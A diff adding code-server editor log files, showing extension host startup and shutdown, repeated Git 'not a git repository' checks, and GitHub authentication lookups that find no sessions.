@@ -0,0 +1,19 @@ +2026-01-27 08:00:00.319 [info] Extension host with pid 50764 started +2026-01-27 08:00:00.319 [error] Error: EEXIST: file already exists, open '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock' +2026-01-27 08:00:00.320 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock': Could not acquire lock, checking if the file is stale. +2026-01-27 08:00:00.321 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock': The pid 46172 appears to be gone. +2026-01-27 08:00:00.321 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock': Deleting a stale lock. +2026-01-27 08:00:00.329 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock': Lock acquired. +2026-01-27 08:00:00.498 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-27 08:00:00.499 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-27 08:00:00.616 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-27 08:00:00.667 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-27 08:00:00.668 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-27 08:00:00.842 [info] Eager extensions activated +2026-01-27 08:00:00.842 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-27 08:00:00.843 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-27 08:00:01.322 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-27 10:07:07.331 [info] ExtensionService#_doActivateExtension vscode.npm, startup: false, activationEvent: 'onTerminalQuickFixRequest:ms-vscode.npm-command' +2026-01-27 11:00:43.892 [info] Extension host terminating: received terminate message from renderer +2026-01-27 11:00:43.893 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-27 11:00:43.923 [info] Extension host with pid 50764 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.git/Git.log new file mode 100755 index 0000000..6a1373e --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.git/Git.log @@ -0,0 +1,143 @@ +2026-01-27 08:00:01.072 [info] [main] Log level: Info +2026-01-27 08:00:01.072 [info] [main] Validating found git in: "git" +2026-01-27 08:00:01.072 [info] [main] Using git "2.39.5" from "git" +2026-01-27 08:00:01.072 [info] [Model][doInitialScan] Initial repository scan started +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [4ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 08:00:01.072 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.072 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-27 08:00:01.105 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 08:00:01.105 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.319 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 08:00:01.319 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 08:00:01.492 [info] > git rev-parse --show-toplevel [4ms] +2026-01-27 08:00:01.492 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 09:11:43.933 [info] > git rev-parse --show-toplevel [5ms] +2026-01-27 09:11:43.933 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:16:06.616 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:16:06.616 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:18:09.142 [info] > git rev-parse --show-toplevel [9ms] +2026-01-27 10:18:09.142 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:18:09.765 [info] > git rev-parse --show-toplevel [5ms] +2026-01-27 10:18:09.765 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:18:13.214 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:18:13.214 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:18:23.051 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:18:23.051 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:18:54.024 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:18:54.024 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:19:43.436 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 10:19:43.436 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:20:08.317 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 10:20:08.317 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:20:18.866 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 10:20:18.866 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:21:06.330 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:21:06.330 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:21:25.332 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 10:21:25.332 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:21:53.680 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 10:21:53.680 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:22:12.680 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:22:12.680 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:22:26.998 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 10:22:26.998 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:22:48.601 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:22:48.601 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:23:19.625 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:23:19.625 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:23:32.991 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:23:32.991 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:23:47.071 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 10:23:47.071 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:23:48.541 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 10:23:48.541 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:24:15.608 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 10:24:15.608 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:24:33.461 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 10:24:33.461 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:24:50.273 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:24:50.273 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:25:10.244 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 10:25:10.244 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:25:16.666 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:25:16.666 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:51:59.904 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:51:59.904 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:52:18.373 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 10:52:18.373 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:52:33.318 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:52:33.318 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 10:52:50.187 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 10:52:50.187 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..2b81258 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-27 08:00:00.753 [info] Reading sessions from keychain... +2026-01-27 08:00:00.753 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.753 [info] Got 0 sessions for ... +2026-01-27 08:00:00.753 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.753 [info] Got 0 sessions for ... +2026-01-27 08:00:00.753 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.753 [info] Got 0 sessions for ... +2026-01-27 08:00:00.753 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.753 [info] Got 0 sessions for ... +2026-01-27 08:00:00.753 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.753 [info] Got 0 sessions for ... +2026-01-27 08:00:00.753 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.753 [info] Got 0 sessions for ... +2026-01-27 08:00:00.753 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.753 [info] Got 0 sessions for ... +2026-01-27 08:00:00.753 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.753 [info] Got 0 sessions for ... +2026-01-27 08:00:00.753 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.753 [info] Got 0 sessions for ... +2026-01-27 08:00:00.774 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.774 [info] Got 0 sessions for ... +2026-01-27 08:00:00.800 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.800 [info] Got 0 sessions for ... +2026-01-27 08:00:00.801 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.801 [info] Got 0 sessions for ... +2026-01-27 08:00:00.801 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.801 [info] Got 0 sessions for ... +2026-01-27 08:00:00.801 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.801 [info] Got 0 sessions for ... +2026-01-27 08:00:00.801 [info] Getting sessions for all scopes... +2026-01-27 08:00:00.801 [info] Got 0 sessions for ... +2026-01-27 08:00:01.543 [info] Getting sessions for all scopes... +2026-01-27 08:00:01.543 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.github/GitHub.log new file mode 100755 index 0000000..b87cd1d --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-27 08:00:01.075 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/remoteexthost.log new file mode 100755 index 0000000..27b46d4 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/remoteexthost.log @@ -0,0 +1,14 @@ +2026-01-27 18:12:59.582 [info] Extension host with pid 83902 started +2026-01-27 18:12:59.591 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-27 18:12:59.744 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-27 18:12:59.745 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-27 18:12:59.849 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-27 18:12:59.864 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-27 18:12:59.864 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-27 18:13:00.196 [info] Eager extensions activated +2026-01-27 18:13:00.196 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-27 18:13:00.196 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-27 18:13:00.232 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-27 22:09:45.096 [info] Extension host terminating: received terminate message from renderer +2026-01-27 22:09:45.097 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-27 22:09:45.142 [info] Extension host with pid 83902 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.git/Git.log new file mode 100755 index 0000000..8731432 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.git/Git.log @@ -0,0 +1,362 @@ +2026-01-27 18:13:00.357 [info] [main] Log level: Info +2026-01-27 18:13:00.357 [info] [main] Validating found git in: "git" +2026-01-27 18:13:00.357 [info] [main] Using git "2.39.5" from "git" +2026-01-27 18:13:00.357 [info] [Model][doInitialScan] Initial repository scan started +2026-01-27 18:13:00.357 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 18:13:00.357 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.357 [info] > git rev-parse --show-toplevel [77ms] +2026-01-27 18:13:00.357 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.357 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 18:13:00.357 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.357 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 18:13:00.357 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.357 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 18:13:00.357 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.362 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 18:13:00.362 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.376 [info] > git rev-parse --show-toplevel [11ms] +2026-01-27 18:13:00.376 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.380 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 18:13:00.380 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.384 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 18:13:00.384 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.388 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 18:13:00.388 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.392 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 18:13:00.392 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.396 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 18:13:00.396 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.400 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 18:13:00.400 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.403 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-27 18:13:00.408 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 18:13:00.408 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:00.442 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 18:13:00.442 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 18:13:01.710 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 18:13:01.710 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:06:21.903 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:06:21.903 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:11:09.900 [info] > git rev-parse --show-toplevel [4ms] +2026-01-27 19:11:09.900 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:11:23.993 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:11:23.993 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:11:35.133 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:11:35.133 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:13:08.866 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:13:08.866 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:13:20.141 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:13:20.141 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:13:30.327 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:13:30.327 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:13:39.888 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:13:39.889 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:17:35.043 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:17:35.044 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:17:44.891 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:17:44.891 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:17:54.905 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:17:54.906 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:18:11.344 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:18:11.344 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:19:18.512 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:19:18.512 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:19:42.139 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:19:42.139 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:19:50.381 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:19:50.381 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:20:00.731 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:20:00.731 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:22:33.037 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:22:33.037 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:22:58.943 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:22:58.943 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:23:08.550 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:23:08.550 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:23:19.256 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:23:19.256 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:23:31.993 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:23:31.993 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:26:55.874 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 19:26:55.874 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:27:06.094 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:27:06.094 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 19:27:17.358 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 19:27:17.358 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary 